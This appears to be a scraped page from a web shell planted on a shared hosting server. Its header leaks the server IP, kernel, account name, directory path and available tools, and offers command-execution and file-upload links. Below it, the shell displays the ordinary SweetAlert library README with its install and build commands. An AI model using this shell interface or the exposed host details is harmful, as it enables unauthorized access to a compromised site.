Server IP : 162.214.80.37 / Your IP : 216.73.216.83 Web Server : Apache System : Linux sh013.webhostingservices.com 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : imyrqtmy ( 2189) PHP Version : 8.2.18 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home2/imyrqtmy/public_html/agriba/vendor/sweetalert/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
#SweetAlert An awesome replacement for JavaScript's alert. [See it in action!](http://tristanedwards.me/sweetalert)  #Usage You can install SweetAlert through bower: ```bash bower install sweetalert ``` Alternatively, download the package and reference the JavaScript and CSS files manually: ```html <script src="lib/sweet-alert.min.js"></script> <link rel="stylesheet" type="text/css" href="lib/sweet-alert.css"> ``` #SASS The css is built with the `--style compressed` and `--sourcemap=none` options: sass --style compressed --sourcemap=none sweet-alert.scss sweet-alert.css